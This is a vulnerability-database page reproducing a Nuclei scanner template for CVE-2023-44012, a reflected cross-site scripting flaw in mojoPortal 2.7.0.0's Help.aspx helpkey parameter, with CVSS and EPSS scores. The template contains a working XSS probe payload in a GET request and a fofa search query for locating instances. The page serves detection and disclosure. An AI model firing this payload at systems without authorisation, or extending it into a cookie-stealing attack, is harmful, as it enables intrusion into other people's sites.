Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-44012
HistoryJul 08, 2024 - 11:00 a.m.

mojoPortal v.2.7.0.0 - Cross-Site Scripting

2024-07-0811:00:51
ProjectDiscovery
github.com
11
mojoportal
cross-site scripting
remote code execution

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

7.2

Confidence

High

EPSS

0.041

Percentile

92.3%

Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.
id: CVE-2023-44012

info:
  name: mojoPortal v.2.7.0.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability.
  reference:
    - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-44012
    cwe-id: CWE-79
    epss-score: 0.0009
    epss-percentile: 0.37745
    cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mojoportal
    product: mojoportal
    fofa-query: title="mojoPortal"
  tags: cve,cve2023,mojoportal,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "mojoPortal", "mojo-accordion", "mojo-tabs")'
          - 'contains(body, "><svg/onload=alert()")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100cd6185b6e56132b8c274e31dcef1c6e02fe7ddd070bc50eb710224cb0850888802206b2a8a991b73a8b11a02a7d24445a651ed2e125da83ee768f658fb17dea5e16d:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

7.2

Confidence

High

EPSS

0.041

Percentile

92.3%

Related for NUCLEI:CVE-2023-44012